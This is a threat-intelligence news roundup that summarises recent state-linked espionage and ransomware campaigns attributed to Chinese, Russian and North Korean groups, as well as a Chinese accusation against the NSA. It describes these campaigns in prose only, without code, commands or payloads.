FlagThis

Chinese cybersecurity entities have accused the U.S. National Security Agency (NSA) of orchestrating a cyberattack on Northwestern Polytechnical University, a prominent Chinese institution specializing in aerospace and defense research.The reports, claim that the NSA’s Tailored Access Operations (TAO) division conducted a prolonged cyber espionage campaign against the university to steal data. The report details the tools, tactics, and procedures (TTPs) allegedly used by the NSA, providing a rare glimpse into Chinese attribution efforts.

Multiple reports detail Chinese APT groups using custom malware, like JumbledPath, and exploiting vulnerabilities to target U.S. telecom providers and European healthcare organizations. These attacks involve advanced techniques such as exploiting Check Point flaws, deploying ShadowPad and NailaoLocker ransomware, and using PowerShell for data exfiltration, blurring the lines between espionage and financially-motivated cybercrime. The campaigns aim to steal data, conduct espionage, and potentially deploy ransomware. The attackers are using techniques like exploiting Check Point flaws to deploy ShadowPad and ransomware.

Russian state-sponsored hackers are actively exploiting the “linked devices� feature in Signal Messenger to conduct cyber-espionage campaigns. Groups like APT44 (Sandworm), UNC5792, UNC4221, and Turla target military personnel, politicians, and activists to compromise their secure communications. These actors abuse Signal’s feature to gain persistent access to accounts, using phishing tactics to trick users into linking their devices to attacker-controlled systems. Mandiant warns of the real-time spying risks associated with this activity, which primarily targets Ukrainian entities amidst Russia’s ongoing invasion.

The Chinese cyber espionage group Salt Typhoon is actively expanding its espionage campaign by compromising additional telecom networks globally between December 2024 and January 2025. They are using a custom malware called JumbledPath to monitor network traffic. They are gaining access primarily through stolen credentials and exploiting a six-year-old vulnerability in Cisco routers.

The Chinese nation-state-backed threat actor Salt Typhoon has been actively targeting telecommunications providers, compromising at least five companies between December and January of 2025. This campaign demonstrates the persistence of the group, despite sanctions. Exploitation attempts involved vulnerabilities in Cisco devices, highlighting the continued need for robust security measures in the telecommunications sector.

The RedCurl/EarthKapre APT group has been actively targeting organizations, particularly those in the legal sector, for corporate espionage. The group uses sophisticated techniques, including Indeed-themed phishing emails, to gain initial access. A legitimate Adobe executable is then used to sideload the EarthKapre/RedCurl loader, which exfiltrates data through Cloudflare Workers for command and control. The attackers leverage reconnaissance tools to gather information about the target environment before deploying their loader and exfiltrating sensitive data.

The China-based Winnti Group (aka APT41) is targeting Japanese organizations in the manufacturing, materials, and energy sectors with a new malware campaign dubbed RevivalStone. The campaign employs a novel version of the Winnti malware with enhanced capabilities and evasion techniques.

The EagerBee malware campaign, attributed to the Chinese-linked threat group CoughingDown (APT27), targets government agencies and Internet Service Providers (ISPs) in the Middle East. This campaign uses advanced backdoor capabilities and novel technical implementations for stealth and persistence. EagerBee poses a significant threat to critical infrastructure in the region. It is important to keep systems up to date and monitor systems for compromise.

Espionage tools typically associated with China-linked threat actors were detected in a November 2024 RA World ransomware attack against an Asian software and services firm. Attackers first focused on cyberespionage in an attack against a Southeastern European country’s foreign ministry in July and compromised the Asian firm by exploiting a Palo Alto Networks PAN-OS flaw and pilfering Amazon AWS S3 bucket data and credentials.

The North Korea-linked APT group Kimsuky, also known as Emerald Sleet, is using a new tactic to compromise its traditional espionage targets. The group is tricking targets into running PowerShell as an administrator and executing malicious code. They build rapport with targets before sending a spear-phishing email with an attached PDF. The registration link has instructions to open PowerShell as an administrator and paste code provided by Emerald Sleet. If the target runs the code as an administrator, the code downloads and installs a browser-based remote desktop tool. This allows the threat actor to access the device and carry out data exfiltration.

The Sandworm group, a Russian military cyber-espionage unit, is actively targeting Windows users in Ukraine. They are distributing trojanized versions of Microsoft Key Management Service (KMS) activators and fake Windows updates to compromise systems. This campaign highlights the ongoing cyber warfare efforts by Russian actors and the potential risks associated with using unofficial activation tools.